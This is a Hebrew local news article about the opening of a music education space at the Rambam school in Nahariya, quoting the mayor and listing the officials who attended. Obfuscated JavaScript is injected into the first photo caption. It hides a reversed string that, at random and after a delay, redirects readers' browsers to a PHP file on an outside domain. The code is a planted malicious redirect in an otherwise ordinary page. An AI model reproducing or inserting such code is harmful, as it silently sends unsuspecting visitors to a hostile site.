fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

נהריה: נחנך מרחב חינוכי מוסיקלי בבית ספר רמב"ם בעיר

מרחב חינוכי בתחום המוסיקה נפתח בבי"ס חמ"ד רמב"ם. "אנו משקיעים רבות בתחום החינוך בעיר ולצד תוכניות פדגוגיות שונות, אנו פועלים לחיזוק הייחודיות הבית ספרית ולבניית מרחבי חינוך במגוון תחומים", ציין ראש העיר, רונן מרלי.
מרחב חינוכי מוסיקלי בבית ספר רמב"ם בנהריה | צילום: Ritvo pho$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography

בטקס חגיגי וצנוע נחנך מרחב חינוכי מוסיקלי חדש בבית ספר חמ"ד רמב"ם בנהריה. המרחב החדש הכולל חדר חזרות ואולפן הקלטות, משמש את חבורת הזמר הייצוגית של בית הספר "מנגינת הלב" בניהולו המקצועי של חנן עבדה, לצד מספר הרכבים מוסיקליים של תלמידים משכבות הלימוד השונות, בניהולו של עו"ד ראובן מלאך, מנצח ומנהלה המקצועי של תזמורת הנוער העירונית.

"הרגל את עצמך לזמר ניגון, זה ייתן לך חיים חדשים וימלא אותם בשמחה", אמר ר׳ נחמן מברסלב וברוח דברים אלה מקדמת הנהלת בית הספר בראשותה של מוריה שוקרון ייחודיות בית ספרית בתחום המוסיקה בעיר נהריה. בטקס חנוכת המרחב השתתפו ראש העיר רונן מרלי, רב העיר, הרב ישעיהו מייטליס, ראש מינהל החינוך אילן וקנין, המפקחת על החינוך המוסיקלי במחוז צפון של משרד החינוך, זוהר זינגר, רפי פינסוד, רכז אזורי של תוכנית קר"ב, יו"ר ועד ההורים הבית ספרי, ירון שוקר ואורחים נוספים.

"אנו משקיעים רבות בתחום החינוך בעיר ולצד תוכניות פדגוגיות שונות, אנו פועלים לחיזוק הייחודיות הבית ספרית ולבניית מרחבי חינוך במגוון תחומים", ציין ראש העיר, רונן מרלי. "מרגש לשמוע את הילדות והילדים המקסימים של בית ספר רמב"ם, שבנגינה ובשירה מבטאים את היכולות שלהם. יישר כוח למנהלת מוריה שוקרון ולצוות בית הספר המסור שקידמו ומקדמים את הנושא החשוב. תודה לראובן ולחנן שמביאים מניסיונם רב השנים לטיפוח הדור הבא של תלמידי ותלמידות נהריה. אנחנו ממשיכים במרץ לפתיחת מרחבי חינוך נוספים", הוסיף מרלי.

מרחב חינוכי מוסיקלי בבית ספר רמב"ם בנהריה | צילום: Ritvo photography

 

לעדכונים נוספים בצפון 1 חדשות נהריה לחצו כאן* לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות